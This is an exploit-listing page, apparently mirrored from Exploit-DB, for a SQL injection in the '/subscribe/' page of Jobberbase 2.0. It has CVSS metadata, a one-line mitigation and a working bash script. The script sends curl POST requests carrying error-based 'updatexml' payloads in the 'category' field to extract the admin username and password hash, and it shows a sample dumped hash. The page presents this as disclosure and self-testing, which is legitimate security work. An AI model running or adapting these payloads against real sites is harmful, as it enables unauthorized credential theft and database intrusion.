header-logo
Suggest Exploit
vendor:
Jobberbase
by:
Damian Ebelties
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jobberbase
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:jobberbase:jobberbase:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 18.04.1
2019

Jobberbase 2.0 – ‘subscribe’ SQL injection

The page '/subscribe/' is vulnerable for SQL injection. Simply make a POST request to /subscribe/ with the parameters: email=jobber@zerodays.lol and category=1337<inject_here>. You can use this script to verify if YOUR OWN instance is vulnerable.

Mitigation:

Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.
Source

Exploit-DB raw data:

#!/bin/bash
# Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: http://www.jobberbase.com/
# Version: 2.0
# Tested on: Ubuntu 18.04.1

: '

    The page "/subscribe/" is vulnerable for SQL injection.

    Simply make a POST request to /subscribe/ with the parameters:
     - email=jobber@zerodays.lol
     - category=1337<inject_here>

    You can use this script to verify if YOUR OWN instance is vulnerable.

    $ bash verify.sh http://localhost/jobberbase/
    admin:1a1dc91c907325c69271ddf0c944bc72

'

: 'Fetch the username'
USERNAME=$(curl -s "$1/subscribe/" \
                -d "email=jobber@zerodays.lol" \
                -d "category=-1337 and updatexml(0,concat(0x0a,(select username from admin limit 0,1),0x0a),0)-- -" \
                -d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")

: 'Ugly way to fetch the password hash'
PASS=$(curl -s "$1/subscribe/" \
            -d "email=jobber@zerodays.lol" \
            -d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,1,16) from admin limit 0,1),0x0a),0)-- -" \
            -d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
WORD=$(curl -s "$1/subscribe/" \
            -d "email=jobber@zerodays.lol" \
            -d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,17,16) from admin limit 0,1),0x0a),0)-- -" \
            -d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")

: 'Print the user:hash (note: default login is admin:admin)'
echo -e "$USERNAME:$PASS$WORD"

Navigation

Suggest Exploit

Services By CQR